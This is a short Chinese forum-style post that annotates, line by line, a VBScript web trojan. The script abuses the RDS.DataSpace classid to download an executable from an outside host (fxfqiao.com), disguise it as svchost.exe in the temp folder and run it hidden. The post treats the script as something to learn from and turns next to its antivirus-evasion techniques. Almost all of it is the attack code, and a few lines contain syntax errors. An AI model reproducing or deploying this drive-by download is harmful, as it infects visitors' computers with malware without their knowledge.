6014脚本解释

Set df = document.createElement("object") '创建项目
　df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36" '对项目进行36位全球唯一码编号
　Set x = df.CreateObject("Microsoft.XMLHTTP,"") '创建一个XMLHTTP项目(用来传输数据)
　set SS = df.createobject("ADODB.Stream","") '创建一个ADOBD数据流格式(数据媒介)
　SS.type = 1 '类型.1好像是2进制.具体忘了
　x.Open Get, "http://fxfqiao.com/laopo/1.exe", False '打开远程文件,这个就是木马文件了
　x.Send '发送
　set F = df.createobject("Scripting.FileSystemObject","") '创建一个文件项目(用来把数据流还原成文件)
　set tmp = F.GetSpecialFolder(2) '这句好像是获得文件夹
　SS.open ''
　fname1= F.BuildPath(tmp,"svchost.exe") '注入到svchost.exe
　SS.write x.responseBody '把远程文件写入数据流中
　SS.savetofile fname1,2 '把数据流存为文件.并且是直接写到svchost.exe的Hook好像,到这里.你的机器已经中毒
　set Q = df.createobject(Shell.Application,"") '创建一个Shell
　Q.ShellExecute fname1,"","","open",0 '到这里.你的病毒开始发挥作用

虽然这个网马现在不是很好用了但是毕竟我们还是可以从它那里学到很多知识  主要学的方法 对吗

大家看下 那么我门来实际看下他的免杀方法 有些地方还是很有学习价值的